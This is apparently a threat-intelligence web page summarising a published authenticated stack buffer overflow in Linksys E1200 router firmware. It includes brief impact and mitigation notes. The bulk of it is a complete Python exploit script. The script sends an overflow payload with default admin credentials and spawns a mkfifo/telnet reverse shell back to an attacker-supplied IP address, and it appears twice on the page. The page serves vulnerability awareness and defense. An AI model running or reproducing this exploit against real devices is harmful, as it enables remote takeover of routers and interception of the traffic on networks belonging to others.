Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)
Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)
AI Analysis
Technical Summary
The Linksys E1200 router running firmware version 2.0.04 contains an authenticated stack buffer overflow vulnerability that allows an attacker with valid credentials to execute arbitrary code remotely. The exploit targets the device's stack memory, leading to potential full system compromise. Public exploit code is available in Python, facilitating reproduction of the attack. No details on affected subversions or vendor patches are provided.
Potential Impact
Successful exploitation can result in remote code execution on the affected device, potentially allowing an attacker to take full control of the router. This can lead to network compromise or interception of traffic passing through the device.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict administrative access to trusted users and networks only. Monitor for updates from Linksys regarding firmware patches addressing this vulnerability.
Indicators of Compromise
- exploit-code: # Exploit Title: Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE) # Date: 2026-15-03 # Exploit Author: JarrettgxzSec # Vendor Homepage: www.linksys.com # Version: FW <= v2.0.04 # Tested on: v2.0.02 & v2.0.04, directly connected to the LAN # CVE: CVE-2025-60690 # Github repository: https://github.com/Jarrettgohxz/CVE-research/tree/main/Linksys/E1200-V2/CVE-2025-60690 import sys import socket import threading import time from urllib.parse import quote print('[!] Please refer to the README (comments at the top of this script) to understand the affected firmware versions for CVE-2025-60690, and for which this exploit script will work on\n') if len(sys.argv) != 3: print(f"[!] Usage: python3 {sys.argv[0]} <ATTACKER_IP> <TARGET_IP>") print(f"[!] Example: python3 {sys.argv[0]} 192.168.1.100 192.168.1.1\n") sys.exit(1) TARGET_IP = sys.argv[2] TARGET_PORT = 80 ATTACKER_IP = sys.argv[1] SHELL_PORT = 8888 def start_shell_listener(): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('0.0.0.0', SHELL_PORT)) print(f"[*] Listening for shell on port {SHELL_PORT}...") s.listen(1) conn, addr = s.accept() print(f"[+] Connection received from {addr[0]}") # allows interactive interaction conn.setblocking(True) conn.settimeout(0.5) while True: # send command to the router cmd = input("# ") conn.send((cmd + "\n").encode()) # receive output from the router try: while True: # keep reading until the device stops sending chunk = conn.recv(4096).decode(errors='ignore') if not chunk: print("\n[!] Connection closed by target.") return print(chunk, end="", flush=True) # timeout decided by the conn.settimeout() method previously except socket.timeout: # this is expected when the device is done sending text pass def execute_exploit(): print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...") # Construct the shell payload payload = "rm /tmp/f \n" payload += "mkfifo /tmp/f \n" payload += "killall httpd && httpd \n" payload += f"cat /tmp/f | /bin/sh 2>&1 | telnet {ATTACKER_IP} {SHELL_PORT} > /tmp/f" payload = quote(f" {payload}") # Construct the exploit payload data = b"action=Apply&lan_netmask=&lan_ipaddr=4&lan_ipaddr_0=x&lan_ipaddr_1=x&lan_ipaddr_2=x&lan_ipaddr_3=" data += b"A"*74 + b"\xa0\x1e\xd6\x2a" + b"A"*24 + b"\x44\xa0\xd6\x2a" + b"A"*72 + b"\xfc\xd8\xd4\x2a" + b"A"*28 data += payload.encode() # Construct the raw HTTP POST body content_length = len(data) http_req = f"POST /apply.cgi HTTP/1.1\r\n" http_req += f"Host: {TARGET_IP}\r\n" http_req += "Content-Type: application/x-www-form-urlencoded\r\n" http_req += "Authorization: Basic YWRtaW46YWRtaW4=\r\n" http_req += f"Content-Length: {content_length}\r\n" http_req += "\r\n" http_req = http_req.encode() + data try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(10) s.connect((TARGET_IP, TARGET_PORT)) s.sendall(http_req) except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # start the shell listener in the background listener_thread = threading.Thread(target=start_shell_listener) listener_thread.daemon = True listener_thread.start() # short sleep to ensure the listener is bound and ready time.sleep(1) # execute the exploit function execute_exploit() # keep main thread alive to interact with the shell while listener_thread.is_alive(): time.sleep(1)
Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)
Description
Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The Linksys E1200 router running firmware version 2.0.04 contains an authenticated stack buffer overflow vulnerability that allows an attacker with valid credentials to execute arbitrary code remotely. The exploit targets the device's stack memory, leading to potential full system compromise. Public exploit code is available in Python, facilitating reproduction of the attack. No details on affected subversions or vendor patches are provided.
Potential Impact
Successful exploitation can result in remote code execution on the affected device, potentially allowing an attacker to take full control of the router. This can lead to network compromise or interception of traffic passing through the device.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict administrative access to trusted users and networks only. Monitor for updates from Linksys regarding firmware patches addressing this vulnerability.
Technical Details
- Edb Id
- 52548
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)
# Exploit Title: Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE) # Date: 2026-15-03 # Exploit Author: JarrettgxzSec # Vendor Homepage: www.linksys.com # Version: FW <= v2.0.04 # Tested on: v2.0.02 & v2.0.04, directly connected to the LAN # CVE: CVE-2025-60690 # Github repository: https://github.com/Jarrettgohxz/CVE-research/tree/main/Linksys/E1200-V2/CVE-2025-60690 import sys import socket import threading import time from urllib.parse import quote print('[!] Please refer t... (3507 more characters)
Threat ID: 69f9a0c3cbff5d8610d729cd
Added to database: 5/5/2026, 7:48:19 AM
Last enriched: 5/5/2026, 7:48:33 AM
Last updated: 5/6/2026, 3:53:41 AM
Views: 8
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.